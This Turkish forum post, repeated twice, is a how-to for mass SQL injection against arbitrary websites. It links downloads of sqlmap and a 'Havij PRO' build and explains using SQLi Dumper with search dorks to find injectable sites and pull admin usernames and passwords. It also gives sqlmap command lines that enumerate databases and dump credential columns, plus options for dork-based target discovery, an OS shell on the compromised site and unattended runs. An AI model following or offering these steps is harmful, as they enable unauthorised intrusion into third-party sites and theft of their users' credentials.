http://www.dosya.tc/server7/qldb73/sqlmap.zip.html
http://www.dosya.tc/server7/uwini0/Havij_1.16_PRO.zip.html
havij 1.17 bende bug veriyor ondan 1.16yı koydum.
ilk önce sqli dumperı kullanmayı anlatıcam.
boş alana sql dorklarımızı yazalım start scanneri 10 yapalım start diyelim
sonra url bulacak program bize.sonra exploitables kısmına gelelim.100 yapalım onuda.sonra start diyelim açıklı siteleri tarıyacak açık varmı diye.
sonra injectables kısmına gelelim 30 yapıp start diyelim burada enjeksiyon yapılabilecek siteler gelecek.
sonra açıklı sitelerden birine tıklayalım sağ tıklayıp go to dumper deyin.oradan get database diyelim datayı seçelim sonra get tables ordanda tablo seçip get columns diyecegiz son olarak username ve pass varsa seçip get data diyelim admin adı ve şifresi gelecektir
evet arkadaşlar bu programla tektek sql aramap zorunda kalmadan topluca sql yapabileceksiniz.
şimdi size sqlmap kullanımı anlatacağım sqlmap için python 2.7 yada cgywin yükleyip çalıştırabilirsiniz.
sqlmap klasörüne gelelim.
sqlmap.py -u "enjeksiyonyapılcakurl" --dbs --threads 10 --random-agent
diyerek seçili sitede açık taraya bilirsiniz eğer açıklı kısım php?id= ise "-p "id"" diyerek işlemi hızlandırabilirsiniz.sonra
sqlmap.py u "enjeksiyonyapılcakurl" -D databaseadı --tables --threads 10 --random-agent
sqlmap.py u "enjeksiyonyapılcakurl" -D databaseadı -T tabloadı --columns --threads 10 --random-agent
sqlmap.py u "enjeksiyonyapılcakurl" -D databaseadı -T tabloadı -C username,pass --threads 10 --random-agent --dump
diyerek siteden username ve pass çekebiliriz karışık gelenler havij kullanabilir o daha kolaydır grafiklidir ama sqlmapda daha çok işlem yapabilirsiniz.
sqlmap.py -g "sqldork" --threads 10 --random-agent
diyerek googlede sql dorklarını taratabilirsiniz
eğer siteye sql ile shell atmak istiyorsanız
sqlmap.py -u "sqlaçıklısite" --os-shell
diyebilirsiniz
--batch komutu eklerseniz size soru sormaz default seçer hep
https://www.virustotal.com/tr/file/...bfcc39e0a62c694e8a4c52cd/analysis/1459678701/
https://www.virustotal.com/tr/file/...e85802454eeb094adfb58150/analysis/1459678712/
http://www.dosya.tc/server7/uwini0/Havij_1.16_PRO.zip.html
havij 1.17 bende bug veriyor ondan 1.16yı koydum.
ilk önce sqli dumperı kullanmayı anlatıcam.
boş alana sql dorklarımızı yazalım start scanneri 10 yapalım start diyelim
sonra url bulacak program bize.sonra exploitables kısmına gelelim.100 yapalım onuda.sonra start diyelim açıklı siteleri tarıyacak açık varmı diye.
sonra injectables kısmına gelelim 30 yapıp start diyelim burada enjeksiyon yapılabilecek siteler gelecek.
sonra açıklı sitelerden birine tıklayalım sağ tıklayıp go to dumper deyin.oradan get database diyelim datayı seçelim sonra get tables ordanda tablo seçip get columns diyecegiz son olarak username ve pass varsa seçip get data diyelim admin adı ve şifresi gelecektir
evet arkadaşlar bu programla tektek sql aramap zorunda kalmadan topluca sql yapabileceksiniz.
şimdi size sqlmap kullanımı anlatacağım sqlmap için python 2.7 yada cgywin yükleyip çalıştırabilirsiniz.
sqlmap klasörüne gelelim.
sqlmap.py -u "enjeksiyonyapılcakurl" --dbs --threads 10 --random-agent
diyerek seçili sitede açık taraya bilirsiniz eğer açıklı kısım php?id= ise "-p "id"" diyerek işlemi hızlandırabilirsiniz.sonra
sqlmap.py u "enjeksiyonyapılcakurl" -D databaseadı --tables --threads 10 --random-agent
sqlmap.py u "enjeksiyonyapılcakurl" -D databaseadı -T tabloadı --columns --threads 10 --random-agent
sqlmap.py u "enjeksiyonyapılcakurl" -D databaseadı -T tabloadı -C username,pass --threads 10 --random-agent --dump
diyerek siteden username ve pass çekebiliriz karışık gelenler havij kullanabilir o daha kolaydır grafiklidir ama sqlmapda daha çok işlem yapabilirsiniz.
sqlmap.py -g "sqldork" --threads 10 --random-agent
diyerek googlede sql dorklarını taratabilirsiniz
eğer siteye sql ile shell atmak istiyorsanız
sqlmap.py -u "sqlaçıklısite" --os-shell
diyebilirsiniz
--batch komutu eklerseniz size soru sormaz default seçer hep
https://www.virustotal.com/tr/file/...bfcc39e0a62c694e8a4c52cd/analysis/1459678701/
https://www.virustotal.com/tr/file/...e85802454eeb094adfb58150/analysis/1459678712/
Son düzenleme:
